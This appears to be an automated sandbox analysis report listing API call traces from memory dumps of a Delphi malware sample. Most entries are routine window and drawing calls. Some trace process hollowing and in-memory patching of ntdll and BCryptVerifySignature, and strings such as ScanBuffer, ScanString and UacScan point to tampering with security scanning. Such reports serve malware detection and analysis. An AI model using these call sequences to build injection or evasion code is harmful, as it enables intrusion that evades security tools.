• SelectPalette.GDI32(?,00000000,00000000), ref: 032D5343
• RealizePalette.GDI32(?), ref: 032D534F
• SetTextColor.GDI32(?,00000000), ref: 032D53B8
• SetBkColor.GDI32(?,00000000), ref: 032D53D2
• SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,032D5560,?,00000000,032D5582,?,00000000,032D5593), ref: 032D541A
• FillRect.USER32(?,?,00000000), ref: 032D53A0
  • Part of subcall function 032D1D04: GetSysColor.USER32(?), ref: 032D1D0E
• PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 032D543C
• CreateCompatibleDC.GDI32(00000028), ref: 032D544F
• SelectObject.GDI32(?,00000000), ref: 032D5472
• SelectPalette.GDI32(?,00000000,00000000), ref: 032D548E
• RealizePalette.GDI32(?), ref: 032D5499
• SetTextColor.GDI32(?,00000000), ref: 032D54B7
• SetBkColor.GDI32(?,00000000), ref: 032D54D1
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 032D54F9
• SelectPalette.GDI32(?,00000000,000000FF), ref: 032D550B
• SelectObject.GDI32(?,00000000), ref: 032D5515
• DeleteDC.GDI32(?), ref: 032D5530
  • Part of subcall function 032D2AC0: CreateBrushIndirect.GDI32(?), ref: 032D2B6B
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
• String ID:
• API String ID: 1299887459-0
• Opcode ID: afa72441bce9856466aeedbe3c89418ac6ea2e7f86f4bf0457d9ec248bc6ecb7
• Instruction ID: 21d91473af0863eb85293616927e6c818f6b755fb138172df81ded6805ad3500
• Opcode Fuzzy Hash: afa72441bce9856466aeedbe3c89418ac6ea2e7f86f4bf0457d9ec248bc6ecb7
• Instruction Fuzzy Hash: 6B12F975A20209AFDB11EFA8C884F9EB7F9EF09350F558455F918EB291C7B4E980CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
  • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
  • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
  • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
  • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
  • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
  • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
  • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
  • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
  • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03330408,033303F8,OpenSession,033303D0,032D9728,ScanString,033303D0), ref: 032D82F1
• GetThreadContext.KERNEL32(00000000,0333044C,ScanString,033303D0,032D9728,UacInitialize,033303D0,032D9728,ScanBuffer,033303D0,032D9728,ScanBuffer,033303D0,032D9728,OpenSession,033303D0), ref: 032D85E6
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,03330520,00000004,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0), ref: 032D8843
• NtUnmapViewOfSection.N(00000000,?,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330520,00000004,03330528), ref: 032D89BE
  • Part of subcall function 032CFB88: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032CFB95
  • Part of subcall function 032CFB88: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFB9B
  • Part of subcall function 032CFB88: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 032CFBBB
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,ScanBuffer,033303D0), ref: 032D8FA1
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,03330524,00000004,03330528,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,00000000), ref: 032D9114
• SetThreadContext.KERNEL32(00000000,0333044C,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330524,00000004,03330528), ref: 032D928A
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,0333044C,ScanBuffer,033303D0,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,00000000,-00000008,03330524), ref: 032D9297
  • Part of subcall function 032CFCE0: LoadLibraryW.KERNEL32(bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0,032D9728,00000000,0333044C), ref: 032CFCF2
  • Part of subcall function 032CFCE0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032CFCFF
  • Part of subcall function 032CFCE0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan), ref: 032CFD16
  • Part of subcall function 032CFCE0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0), ref: 032CFD25
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: MemoryVirtual$LibraryProcessWrite$AddressCurrentProcThread$ContextFreeHandleLoadModule$AllocateCacheCreateFlushInstructionProtectReadResumeSectionUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
• API String ID: 3001626006-1058128293
• Opcode ID: 678d7968992d7a3460673fa9f52e32e44e064f8ad559b88b05a7a94403a0acb9
• Instruction ID: 4bd27d006e4f883d8ddaf7fdd4c4726a668c72e55006c8e6e9e1438550ff325d
• Opcode Fuzzy Hash: 678d7968992d7a3460673fa9f52e32e44e064f8ad559b88b05a7a94403a0acb9
• Instruction Fuzzy Hash: 02D21D79A202189FDB15FB65DDD0BCEB3B9AF44740F1181A2E104AF216DBB1AEC58F44
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID:
• String ID: RegisterAutomation$vcltest3.dll
• API String ID: 0-2963190186
• Opcode ID: 2251e7e25a31b0f6c3b6f6a1577c0e00cec3d1eba38d1263d8e41cca6a53691c
• Instruction ID: 01f38cb532da6bc47e63f3df6076d69b6df4efa2f86064f8bd1c476eb61ab0f8
• Opcode Fuzzy Hash: 2251e7e25a31b0f6c3b6f6a1577c0e00cec3d1eba38d1263d8e41cca6a53691c
• Instruction Fuzzy Hash: C8E14F3DA04204EFDB14DBA9C9E4A9EF7B5AF49361F1881E5E4459B7A1C734EE84CB00
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5C35
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 032B5C4C
• lstrcpynA.KERNEL32(?,?,?), ref: 032B5C7C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5CE0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D16
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D29
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D3B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000,0331A794), ref: 032B5D47
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18,032B0000), ref: 032B5D7B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,032B7A18), ref: 032B5D87
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 032B5DA9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: 980d73ece5758f1adf3b4164e84bf712cd93b81a5b8db27408bc7cae6302f6b1
• Instruction ID: f1d84881b6dc4974f126d8da1f2ed3edf056a6abd4f42859340214de243b5bc6
• Opcode Fuzzy Hash: 980d73ece5758f1adf3b4164e84bf712cd93b81a5b8db27408bc7cae6302f6b1
• Instruction Fuzzy Hash: B141A275D2066AAFDB10DEE8CC88ADFB3BDEF49380F1445A5A154DB240D770AED48B50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: 0e96521bc7d61e2baa9f060a13760773cea95cf5f4dfbfd60000b1544d1f65ca
• Instruction ID: e6b9a38934569b78719759192b50ecfe35d9ff2ef2b590a1af4c452d8ec3b3a3
• Opcode Fuzzy Hash: 0e96521bc7d61e2baa9f060a13760773cea95cf5f4dfbfd60000b1544d1f65ca
• Instruction Fuzzy Hash: 38021F39A14244EFDB55EBA8CAD4F9DB7F8AB04300F5941E0F504AB3A2D775AE80DB40
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 032B5EF8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 032B5F05
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 032B5F0B
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 032B5F36
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5F7D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5F8D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 032B5FB5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 032B5FC5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 032B5FEB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 032B5FFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
• Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
• Instruction ID: d8d77b2abaec448e52e3b6fb0cf959862133fe9b4c810bce088ac74bc9a21b7c
• Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
• Instruction Fuzzy Hash: 55318675E2026D29FF26D5B8DC46BEEB7BC5B043C0F0845E19644EA181D6B49AD48B90
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 032F2273
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 032F2290
                                                                                                    • GetWindowRect.USER32(?), ref: 032F22A9
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 032F22B7
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 032F22CC
                                                                                                    • ScreenToClient.USER32(00000000), ref: 032F22D9
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 032F22E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: ebf521a3e82b7c8ce86d899e93d29d58912614867133c43a6224c217e64f485c
                                                                                                    • Instruction ID: 8c2231d3907e18fbee9b0ab85022709b29c05dc1e05afd3c098ac18b27651754
                                                                                                    • Opcode Fuzzy Hash: ebf521a3e82b7c8ce86d899e93d29d58912614867133c43a6224c217e64f485c
                                                                                                    • Instruction Fuzzy Hash: 1D113079524301AFCB10EF6CC984A8BB7E8AF89350F044965BE58DF246D775D8448B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SaveDC.GDI32(?), ref: 032E40E8
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032E415C
                                                                                                    • GetWindowDC.USER32(?,00000000,032E434C), ref: 032E41D6
                                                                                                    • SaveDC.GDI32(?), ref: 032E420D
                                                                                                    • RestoreDC.GDI32(?,?), ref: 032E427A
                                                                                                    • DefWindowProcA.USER32(?,?,?,?,00000000,032E434C), ref: 032E432E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSaveWindow$Proc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1975259465-0
                                                                                                    • Opcode ID: f7368f26b618b2396db3831e508b7babd7511b6ba15f60d610b06f08c1322010
                                                                                                    • Instruction ID: e26a13852b176b36c5b503a023810f9e363afbfff67e1ef46ee1e4b0e8cbf6d4
                                                                                                    • Opcode Fuzzy Hash: f7368f26b618b2396db3831e508b7babd7511b6ba15f60d610b06f08c1322010
                                                                                                    • Instruction Fuzzy Hash: B5E14038A20209DFCB10EFAAC48199EF7F5FF98300BA985A5E555AB714D770ED81CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: RestoreSave$FocusWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1553564791-0
                                                                                                    • Opcode ID: 52a2500966fc439c07e0efee1e243f576fd145b2fc175eeeb193c9ef6552d789
                                                                                                    • Instruction ID: 166adc152b2e25eeaefa5a0a7472be26a240e57141b5fe6bfbd454aed8208490
                                                                                                    • Opcode Fuzzy Hash: 52a2500966fc439c07e0efee1e243f576fd145b2fc175eeeb193c9ef6552d789
                                                                                                    • Instruction Fuzzy Hash: 3BC18E35A2421DDFDB14EB68C985ABEF3F5EB44300F5940B1E549AB255CB70EE82CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0,032D9728,00000000,0333044C), ref: 032CFCF2
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 032CFCFF
                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan), ref: 032CFD16
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,032D9728,ScanString,033303D0,032D9728,Initialize,033303D0,032D9728,UacScan,033303D0,032D9728,UacInitialize,033303D0), ref: 032CFD25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: 9c0331ecc18621830deb80fafc78ef70a2fb69f44d9da6e652ded26041c08f51
                                                                                                    • Instruction ID: ba603ea36d14be8e4910d07c31ce536e67fa0ea6481aca7a0cf09ec29c3ea48a
                                                                                                    • Opcode Fuzzy Hash: 9c0331ecc18621830deb80fafc78ef70a2fb69f44d9da6e652ded26041c08f51
                                                                                                    • Instruction Fuzzy Hash: BCF02E762253553DD120D1245D40EFF62ADCBC27A1F08473DF9549A180D7A18D8883F5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 033039B0
                                                                                                    • SetActiveWindow.USER32(?,?,?,?,033033AA,00000000,0330387E), ref: 033039C1
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 033039E4
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,033033AA,00000000,0330387E), ref: 033039FD
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,033033AA,00000000,0330387E), ref: 03303A43
                                                                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,033033AA,00000000,0330387E), ref: 03303A91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledFocusIconicProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 848842217-0
                                                                                                    • Opcode ID: 06ca2b1c5734c5e5057a57286698f434e265f60cdc8cf30af14d2d484b51b90d
                                                                                                    • Instruction ID: eb527408851d9f85237825f14a7c53d688d767c28eaa56d8c51e38fc16e8efab
                                                                                                    • Opcode Fuzzy Hash: 06ca2b1c5734c5e5057a57286698f434e265f60cdc8cf30af14d2d484b51b90d
                                                                                                    • Instruction Fuzzy Hash: B8312E79B103409BEB24EA68CDD4FAA77ACAF04750F0C14A5FE04EF2D6D6B4E8848754
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 032F1977
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 032F1995
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 032F19CB
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 032F19EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 568898626-3772416878
                                                                                                    • Opcode ID: 270ef7ac14398b7a7cda34cb21d5cbccd4aa780e520a53b2575b1ccb6a4c7180
                                                                                                    • Instruction ID: 6a3e1b6e48c3ede2ca78181a7b1b44843be098fd475bbcddf41d20d4c1d92c7d
                                                                                                    • Opcode Fuzzy Hash: 270ef7ac14398b7a7cda34cb21d5cbccd4aa780e520a53b2575b1ccb6a4c7180
                                                                                                    • Instruction Fuzzy Hash: FD21F975A10204AFCF14EF69C8809DAB7A8AF49350F448565FE19DF206D7B1E8848BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 033038EB
                                                                                                    • SetActiveWindow.USER32(?,?,?,0330339D,00000000,0330387E), ref: 03303903
                                                                                                      • Part of subcall function 03302F70: EnumWindows.USER32(Function_00052F00,00000000), ref: 03302F9A
                                                                                                      • Part of subcall function 03302F70: ShowOwnedPopups.USER32(00000000,?), ref: 03302FC9
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0330392F
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,0330339D,00000000,0330387E), ref: 03303962
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,0330339D), ref: 03303977
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
